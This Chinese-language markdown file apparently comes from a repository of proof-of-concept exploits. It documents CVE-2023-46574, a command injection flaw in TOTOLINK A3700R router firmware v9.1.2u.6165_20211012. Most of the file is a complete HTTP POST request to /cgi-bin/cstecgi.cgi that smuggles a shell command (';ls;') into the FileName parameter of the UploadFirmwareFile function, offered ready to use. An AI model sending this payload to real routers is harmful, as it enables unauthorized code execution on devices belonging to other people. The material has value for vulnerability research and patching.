admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
POC00/TOTOLINK A3700R命令执行漏洞CVE-2023-46574.md

34 lines
1.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## TOTOLINK A3700R命令执行漏洞CVE-2023-46574
TOTOLINK A3700R v9.1.2u.6165_20211012版本存在命令执行漏洞攻击者可利用该漏洞通过UploadFirmwareFile函数的FileName参数执行任意代码。
## 影响版本:
```
TOTOLINK A3700R v9.1.2u.6165_20211012
```
## poc
```
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.122.15
Content-Length: 73
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.122.15
Referer: http://192.168.122.15/basic/index.html?time=1697964093345
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSION_ID=2:1697964047:2
Connection: close
{"topicurl":"UploadFirmwareFile","FileName":";ls;"}
```
![image](https://github.com/wy876/POC/assets/139549762/37a0b1f8-101e-4642-b9fa-3fda6f31f079)
## 来源
- https://github.com/OraclePi/repo/blob/main/totolink%20A3700R/1/A3700R%20%20V9.1.2u.6165_20211012%20vuln.md
Reference in New Issue View Git Blame Copy Permalink